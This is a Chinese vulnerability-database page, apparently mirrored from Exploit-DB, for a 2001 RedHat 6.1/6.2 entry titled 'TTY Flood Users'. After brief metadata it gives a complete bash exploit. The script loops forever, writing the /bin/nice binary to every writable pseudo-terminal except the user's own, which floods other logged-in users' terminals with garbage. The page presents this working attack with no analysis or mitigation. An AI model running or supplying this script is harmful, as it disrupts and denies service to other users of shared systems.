RedHat 6.1/6.2 – TTY Flood Users

19次阅读
没有评论

RedHat 6.1/6.2 – TTY Flood Users

漏洞ID 1053509 漏洞类型
发布时间 2001-01-02 更新时间 2001-01-02
RedHat 6.1/6.2 - TTY Flood UsersCVE编号 N/A
RedHat 6.1/6.2 - TTY Flood UsersCNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/236
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/bin/bash
#
# by teleh0r

TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY

while /bin/true ; do
    for i in $TTYDIR/* ; do
        if [ -w $i -a -c $i -a $i != $MYTTY ]; then
            cat $NONSENSE > $i
        fi
    done
done

unset i


# milw0rm.com [2001-01-02]

相关推荐: SCO OpenServer cancel Buffer Overflow Vulnerability

SCO OpenServer cancel Buffer Overflow Vulnerability 漏洞ID 1104565 漏洞类型 Boundary Condition Error 发布时间 1999-10-08 更新时间 1999-10-08 CVE…

正文完
 0